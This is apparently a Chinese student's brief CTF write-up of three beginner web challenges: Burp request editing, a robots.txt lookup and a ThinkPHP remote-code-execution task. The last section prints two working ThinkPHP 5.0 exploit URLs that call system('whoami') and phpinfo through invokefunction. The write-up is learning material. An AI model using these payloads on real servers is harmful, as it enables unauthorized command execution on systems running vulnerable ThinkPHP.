感觉进阶区的前几个题目对我来说还算友好
但是看到后面的题目感觉不知道的知识点越来越多
不知道能不能按时完成任务
学到的新知识点就等着期末考结束之后再系统整理吧(被考试复习周支配的恐惧orz,所以先留个坑)
这里先对题目的解法进行简单记录
baby_web
burpsuit抓包,在里面修改请求行为/index.php即可得flag
Training-WWW-Robots
访问/robots.txt查看robots exclusion standard得到禁止访问的特定目录/fl0g.php
因此我们访问根目录下/fl0g.php即可得到flag
php_rce
只有一个提示ThinkPHP,于是搜索ThinkPHP
发现它存在命令执行漏洞
百度得到两个可用的EXP
- 利用system函数远程命令执行:
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami - 通过phpinfo函数写出phpinfo()信息
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1